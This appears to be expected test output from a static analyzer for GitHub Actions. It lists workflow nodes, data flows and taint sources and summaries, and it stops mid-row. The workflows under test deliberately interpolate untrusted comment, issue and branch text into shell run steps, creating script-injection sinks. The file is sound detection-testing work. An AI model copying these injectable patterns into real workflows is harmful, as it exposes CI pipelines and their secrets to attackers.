.github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | 
on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| 
.github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -cfgNodes -| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ 
github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:1:1:33:14 | enter on: | -| .github/workflows/multiline.yml:1:1:33:14 | exit on: | -| .github/workflows/multiline.yml:1:1:33:14 | exit on: (normal) | -| .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step 
| -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/test.yml:1:1:40:53 | enter on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | 
-dfNodes -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ 
github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ 
steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -argumentNodes -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -usesIds -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | -nodeLocations -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | 
-| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | -| .github/workflows/expression_nodes.yml:16:14:19:57 | 
LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e 
"$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | 
.github/workflows/test.yml@5:5:31:2 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | 
-| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | -scopes -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/test.yml:1:1:40:53 | on: push | -sources -| ahmadnassri/action-changed-files | * | output.files | PR changed files | manual | -| ahmadnassri/action-changed-files | * | output.json | PR changed files | manual | -| amannn/action-semantic-pull-request | * | output.error_message | PR title | manual | -| cypress-io/github-action | * | env.GH_BRANCH | PR branch | manual | -| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | manual | -| dorny/paths-filter | * | output.changes | PR changed files | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | -| googlecloudplatform/magic-modules | * | output.changed-files | PR changed files | manual | -| jitterbit/get-changed-files | * | output.added | PR changed files | manual | -| jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | -| jitterbit/get-changed-files | * | output.all | PR changed files | manual | -| jitterbit/get-changed-files | * | output.deleted | PR changed files | manual | -| jitterbit/get-changed-files | * | output.modified | PR changed files | manual | -| jitterbit/get-changed-files | * | output.removed | PR changed files | manual | -| jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | 
-| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | -| marocchino/on_artifact | * | output.* | Downloaded artifact | manual | -| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | Changed files | manual | -| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | -| tj-actions/branch-names | * | output.current_branch | PR current branch | manual | -| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | -| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | manual | -| tj-actions/changed-files | * | output.added_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.changed_keys | PR changed files | manual | -| tj-actions/changed-files | * | output.copied_files | PR changed files | manual | -| tj-actions/changed-files | * | output.deleted_files | PR changed files | manual | -| tj-actions/changed-files | * | output.modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.modified_keys | PR changed files | manual | -| tj-actions/changed-files | * | output.other_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | manual | -| tj-actions/changed-files | * | output.other_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.renamed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.type_changed_files | PR changed files | manual | -| tj-actions/changed-files | * 
| output.unknown_files | PR changed files | manual | -| tj-actions/changed-files | * | output.unmerged_files | PR changed files | manual | -| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | manual | -| trilom/file-changes-action | * | output.files | PR changed files | manual | -| trilom/file-changes-action | * | output.files_added | PR changed files | manual | -| trilom/file-changes-action | * | output.files_modified | PR changed files | manual | -| trilom/file-changes-action | * | output.files_removed | PR changed files | manual | -| tzkhan/pr-update-action | * | output.headMatch | | manual | -| xt0rted/slash-command-action | * | output.command-arguments | | manual | -summaries -| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | -| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | -| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | -| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | -| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | -| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | -| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | -| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | -| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | -| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | -| aws-actions/configure-aws-credentials | * 
